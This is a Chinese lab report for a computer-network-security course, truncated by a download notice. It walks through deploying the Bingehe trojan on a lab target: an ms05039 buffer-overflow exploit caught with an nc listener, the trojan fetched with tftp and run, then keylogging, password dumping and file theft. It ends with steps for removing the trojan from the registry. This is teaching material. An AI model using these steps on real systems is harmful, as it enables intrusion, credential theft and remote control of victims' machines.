计算机网络安全实验报告07(2)

网络安全

3)选择菜单“设置”->“配置服务程序” ;

4)设置访问口令为“1234567” ,其它为默认值，点击 “确定”生成木马的 服务端程序 G_SERVER.EXE。 5)将生成的木马服务程序 G_SERVER.EXE 拷贝到 tftp 服务的目录即 C:\攻防 \tftp32。

网络安全

6)运行 tftpd32.exe。保持此程序一直开启，用于等待攻击成功后传输木马 服务程序。

步骤 2:进行攻击，将木马放置在被攻击端 1)对靶机 P3 进行攻击，首先运行 nc -vv -l -p 99 接着再开一个 dos 窗口，运行 ms05039 192.168.20.23 192.168.20.1 99 1 2)攻击成功后，在运行 nc -vv -l -p 99 的 dos 窗口中出现提示，若攻击不

网络安全

成功请参照“缓冲区溢出攻击与防范实验” ,再次进行攻击。

3)在此窗口中运行 tftp -i 192.168.20.1 get g_server.exe 将木马服务程序 G_server.exe 上传到靶机 P3 上，并直接输入 g_server.exe 使之运行。

步骤 3:运行木马客户程序控制远程主机 1)打开程序端程序，单击快捷工具栏中的“添加主机”按扭，如图 8 所示。 “显示名称” :填入显示在主界面的名称“target”

网络安全

“主机地址” :填入服务器端主机的 IP 地址“192.168.20.23” 。 “访问口令” :填入每次访问主机的密码，这里输入“1234567” 。 “监听端口”“冰河”默认的监听端口是 7626,控制端可以修改它以 ： 绕过防火墙。

单击“确定”按扭，即可以看到主机面上添加了主机。

这时我们就可以像操作自己的电脑一样操作远程目标电脑，比如

打开 C:\WINNT\system32\config 目录可以找到对方主机上保存用户口令的 SAM 文件。 点击鼠标右键， 可以发现有上传和下载功能。 即可以随意将虚拟机器上的机密文件 下载到本机上，也可以把恶意文件上传到该虚拟机上并运行。可见，其破坏性是巨 大的。 2) “文件管理器”使用。点击各个驱动器或者文件夹前面的展开符号，可以

网络安全

浏览目标主机内容。 然后选中文件，在右键菜单中选中“下载文件至...” ,在弹出的对话框中选 好本地存储路径，点击“保存” 。 2) “命令控制台”使用。单击“命令控制台”的标签，弹出命令控制台界面， 验证控制的各种命令。 a. 口令类命令：展开“口令类命令” , a.1 “系统信息及口令” 可以查看远程主机的系统信息， 开机口令， 缓存口令等。 a.2 a.3 “历史口令”可以查看远程主机以往使用的口令。 “击键记录”可以记录远程主机用户击键记录，以次可以分析出远程主机

的各种帐号和口令或各种秘密信息。 b. 控制类命令：展开“控制类命令” , b.1 “捕获屏幕” 可以使控制端使用者查看远程主机的屏幕。 b.2 “发送信息” 可以向远程计算机发送 Windows 标准的各种信息。 b.3 “进程管理” 可以使控制者查看远程主机上所有的进程。单击“查看进程” 按钮，就可以看到远程主机上存在的进程，甚至还可以终止某个进程，只要选中相 应的进程，然后单击“终止进程”就可以了。 b.4 “窗口管理” 可以使远程主机上的窗口进行刷新，最大化，最小化，激活， 隐藏等。 b.5 “系统管理” 可以使远程主机进行关机，重启，重新加载“冰河” ,自动卸 载“冰河”的操作。 b.6 “鼠标控制” 可以使远程主机上的鼠标锁定在某个范围内。 b.7 “其他控制” 可以使远程主机上进行自动拨号禁止，桌面隐藏，注册表锁定 等操作。 c 网络类命令 展开“网络类命令” ,

c.1 “创建共享”在远程主机上创建自己的共享。 c.2 “删除共享”在远程主机上删除某个特定的共享。 c.3 “网络信息”可以看到远程主机上的 IPC$,C$,ADMIN$等共享。 d 文件类命令： 展开“文件类命令” ,"文件浏览", “文件查找”“文件压缩” , , “文件删除”“文件打开”等。 ,

网络安全

e 注册表读写： 展开“注册表读写” f 设置类命令: 展开“设置类命令”

步骤 4:删除“冰河”木马 删除“冰河”木马的方法： A.客户端的自动卸载功能，在“控制命令类”中的“系统控制”里面就有自 动卸载功能，执行这个功能，远程主机上的木马就自动卸载了。 B.手动卸载，查看注册表，打开 windows 注册编辑器。 打开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur

rentVersion\Run 如图 16。在目录中发现了一个默认的键值 C:\WINNT\System32\kernel32.exe,这 就是“冰河”木马在注册表中加入的键值，将它删除。 打开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVesion\Runse rvices。在目录中也发现了一个默认的键值 C:\WINNT\System32\kernel32.exe, 这也是“冰河”在注册表中加入的键值，将它删除。上面两个注册表的子键目录 Run 和 Runservices 中存放的键值是系统启动时自启动的程序，一般病毒程序，木 马程序，后门程序等都放在这些子键目录下，所以要经常检查这些目录下的程序。

网络安全

然后再进入 C:\WINNT\System32 目录，找到“冰河”的两个可执行文件 Kernel32.exe 和 Sysexplr.exe 文件，将它们删除。

修改文件关联也是木马常用的手段， “冰河”将 txt 文件的缺省打开方式由 notepad.exe 改为木马的启动程序，除此之外，html,exe,zip,com 等都是木马 的目标。所以，最后还需要恢复注册表中的 txt 文件关联功能，只要将注册表中的 HKEY_CLASSES_ …… 此处隐藏：2576字，全部文档内容请下载后查看。喜欢就下载吧 ……